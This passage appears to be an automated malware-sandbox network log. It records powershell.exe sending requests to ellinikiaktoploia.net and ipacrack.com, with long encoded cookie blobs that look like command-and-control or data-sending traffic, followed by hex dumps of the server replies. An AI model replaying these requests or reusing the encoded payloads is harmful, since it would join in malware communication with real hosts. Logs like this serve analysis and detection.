6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAk [TRUNCATED]
                  Host: ellinikiaktoploia.net
                  Connection: Close
                  2024-08-27 20:52:47 UTC834INHTTP/1.1 200 OK
                  Date: Tue, 27 Aug 2024 20:52:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  link: <https://ellinikiaktoploia.net/wp-json/>; rel="https://api.w.org/"
                  link: <https://ellinikiaktoploia.net/wp-json/wp/v2/pages/120>; rel="alternate"; title="JSON"; type="application/json"
                  link: <https://ellinikiaktoploia.net/>; rel=shortlink
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AwrU8MMgpsv%2B3ojwg2IaurUGUnHMnew1IvWZCcYu8W1n%2B0mTEA%2F3jFdq51LiezY3%2FXNGFeFL7Su%2B2xfGQyvY6Js04nnx9jtESHLIw6S2L2OQWQUrwN7I22Z1yw0wEThNRGipSMkYEw8%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8b9ef27f48473344-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-08-27 20:52:47 UTC535INData Raw: 36 66 38 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 20 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6c 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e ce 91 cf 81 cf 87 ce b9 ce ba ce ae 20 ce a3 ce b5 ce bb ce af ce b4 ce b1 20 2d 20 ce 95 ce bb ce bb ce b7 ce
                  Data Ascii: 6f84<!doctype html >...[if IE 8]> <html class="ie8" lang="en"> <![endif]-->...[if IE 9]> <html class="ie9" lang="en"> <![endif]-->...[if gt IE 8]>...> <html lang="el"> ...<![endif]--><head> <title> -
                  2024-08-27 20:52:47 UTC1369INData Raw: 3a 6c 61 72 67 65 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c 20 6d 61 78 2d 76 69 64 65 6f 2d 70 72 65 76 69 65 77 3a 2d 31 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 31 63 39 38 61 34 31 61 36 39 66 64 34 39 34 63 30 31 38 63 64 32 30 61 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f
                  Data Ascii: :large, max-snippet:-1, max-video-preview:-1' /><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/1c98a41a69fd494c018cd20a/script.js"></script>... This site is optimized with the Yoast SEO plugin v23.3 - https://
                  2024-08-27 20:52:47 UTC1369INData Raw: 69 61 2e 6e 65 74 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 64 61 74 65 50 75 62 6c 69 73 68 65 64 22 3a 22 32 30 32 31 2d 31 31 2d 32 32 54 31 36 3a 30 31 3a 35 37 2b 30 30 3a 30 30 22 2c 22 64 61 74 65 4d 6f 64 69 66 69 65 64 22 3a 22 32 30 32 34 2d 30 36 2d 32 36 54 31 33 3a 31 31 3a 35 39 2b 30 30 3a 30 30 22 2c 22 62 72 65 61 64 63 72 75 6d 62 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 65 6c 6c 69 6e 69 6b 69 61 6b 74 6f 70 6c 6f 69 61 2e 6e 65 74 2f 23 62 72 65 61 64 63 72 75 6d 62 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6c 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 52 65 61 64 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 65 6c
                  Data Ascii: ia.net/#organization"},"datePublished":"2021-11-22T16:01:57+00:00","dateModified":"2024-06-26T13:11:59+00:00","breadcrumb":{"@id":"https://ellinikiaktoploia.net/#breadcrumb"},"inLanguage":"el","potentialAction":[{"@type":"ReadAction","target":["https://el
                  2024-08-27 20:52:47 UTC1369INData Raw: 69 61 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 38 2f 65 6c 61 6b 74 2d 6c 6f 67 6f 2d 63 6f 6c 6f 75 72 2e 6a 70 67 22 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 68 65 69 67 68 74 22 3a 34 31 34 2c 22 63 61 70 74 69 6f 6e 22 3a 22 ce 95 ce bb ce bb ce b7 ce bd ce b9 ce ba ce ae 20 ce 91 ce ba cf 84 ce bf cf 80 ce bb ce bf cf 8a ce b1 22 7d 2c 22 69 6d 61 67 65 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 65 6c 6c 69 6e 69 6b 69 61 6b 74 6f 70 6c 6f 69 61 2e 6e 65 74 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 2c 22 73 61 6d 65 41 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 65 6c 6c 69 6e 69 6b 69 61 6b 74 6f 70 6c 6f 69 61 2e
                  Data Ascii: ia.net/wp-content/uploads/2022/08/elakt-logo-colour.jpg","width":1200,"height":414,"caption":" "},"image":{"@id":"https://ellinikiaktoploia.net/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/ellinikiaktoploia.
                  2024-08-27 20:52:47 UTC1369INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.f
                  2024-08-27 20:52:47 UTC1369INData Raw: 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a
                  Data Ascii: ent("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:
                  2024-08-27 20:52:47 UTC1369INData Raw: 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d
                  Data Ascii: r e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type=
                  2024-08-27 20:52:47 UTC1369INData Raw: 2d 2d 34 2d 33 3a 20 34 2f 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 33 2d 34 3a 20 33 2f 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 33 2d 32 3a 20 33 2f 32 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 32 2d 33 3a 20 32 2f 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 31 36 2d 39 3a 20 31 36 2f 39 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 39 2d 31 36 3a 20 39 2f 31 36 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: --4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color
                  2024-08-27 20:52:47 UTC1369INData Raw: 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33
                  Data Ascii: ;--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(13
                  2024-08-27 20:52:47 UTC1369INData Raw: 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d
                  Data Ascii: : 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.549718188.114.96.34435952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-08-27 20:52:53 UTC2147OUTGET / HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                  Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAk [TRUNCATED]
                  Host: ipacrack.com
                  Connection: Close
                  2024-08-27 20:52:53 UTC1285INHTTP/1.1 403 Forbidden
                  Date: Tue, 27 Aug 2024 20:52:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Resource-Policy: same-origin
                  Origin-Agent-Cluster: ?1
                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                  Referrer-Policy: same-origin
                  X-Content-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  cf-mitigated: challenge
                  2024-08-27 20:52:53 UTC741INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 44 32 43 68 6d 4f 5a 59 46 4f 73 52 4c 39 34 38 38 50 43 31 51 79 38 69 2b 53 6e 2b 66 35 62 4d 77 45 62 65 57 37 76 62 65 42 39 4b 6d 4b 7a 48 47 4f 2f 70 79 38 39 76 37 71 6a 41 6f 71 57 6c 46 78 50 75 42 6b 33 59 76 67 70 33 6f 53 56 57 33 37 52 31 56 79 65 44 4f 6b 79 56 2f 4c 4a 79 55 47 74 59 34 74 4c 35 79 4c 55 71 5a 4a 45 56 65 64 34 74 4b 57 76 4c 59 2b 38 76 41 68 35 32 5a 4c 4b 35 79 2f 47 38 39 65 72 48 44 45 4e 6c 44 61 75 2b 4d 51 3d 3d 24 79 4a 5a 4a 58 4b 61 76 45 79 45 52 4d 58 70 37 70 39 59 73 6a 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                  Data Ascii: cf-chl-out: D2ChmOZYFOsRL9488PC1Qy8i+Sn+f5bMwEbeW7vbeB9KmKzHGO/py89v7qjAoqWlFxPuBk3Yvgp3oSVW37R1VyeDOkyV/LJyUGtY4tL5yLUqZJEVed4tKWvLY+8vAh52ZLK5y/G89erHDENlDau+MQ==$yJZJXKavEyERMXp7p9Ysjw==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                  2024-08-27 20:52:53 UTC1369INData Raw: 34 36 62 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                  Data Ascii: 46b6<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                  2024-08-27 20:52:53 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                  Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                  2024-08-27 20:52:53 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                  Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                  2024-08-27 20:52:53 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 